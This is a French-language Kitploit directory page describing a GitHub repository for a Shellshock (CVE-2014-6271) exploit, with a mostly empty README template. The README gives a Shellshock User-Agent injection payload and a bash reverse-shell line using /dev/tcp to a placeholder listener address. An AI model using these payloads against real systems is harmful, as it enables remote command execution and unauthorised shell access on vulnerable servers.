Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Shell-Shock — *CVE-2014-6271* Exploit d'exécution de code arbitraire Unix, communément appelé Shell Shock. Des exemples, de la documentation, de la réponse à incident, de l'évaluation des vulnérabilités/risques et des ressources supplémentaires peuvent être déposés ici. Profitez-en :) --- somhmxxghoul --- | Kitploit
Outils/GitHubGitHub/somhm-solutions/shell-shock
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationRéponse aux IncidentsOutil d'Accès à DistanceDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

*CVE-2014-6271* Exploit d'exécution de code arbitraire Unix, communément appelé Shell Shock. Des exemples, de la documentation, de la réponse à incident, de l'évaluation des vulnérabilités/risques et des ressources supplémentaires peuvent être déposés ici. Profitez-en :) --- somhmxxghoul ---

GitHub
somhm-solutions/shell-shock

Shell-Shock

Voir le dépôt
13il y a 6 ansPas encore vérifié
Partager

Shell Shock

*Auteur(s): [email protected] *Mainteneur(s): ** *Département: DevOps *Licence(s): **

Aperçu

Shell Shock: Élévation de privilèges, exécution de code à distance Famille de bogues dans le shell Bash Unix. Permet l'exécution de commandes arbitraires.

Vecteurs d'exploitation


Charges utiles

  • agent utilisateur shellshock = User-Agent: () { :; } ; <$BASH_COMMAND>
  • charge utile rshell = bash -i >& /dev/tcp/127.0.0.1
    • redirection rshell vers l'écouteur = bash -i >& /dev/tcp/$YOUR_IP:$PORT

Astuces

Conception:

  • Objectif:
  • Contenu:
  • Serveur(s):
    • Application:
    • Base de données:
  • Réseau:
    • DNS:
    • Routes:
  • Dépendances applicatives:
  • Programmes dépendants:

Utilisation de base:

  • Utilisation:

  • Cas d'utilisation courants:

  • Exemples:

Tests

Entrée de test

  • Paramètres:
  • Actions:

Sortie de test

  • Sortie:
  • Captures d'écran:
  • Vidéo:
  • Etc.:

Remarques:* [option]:

Télécharger l’outil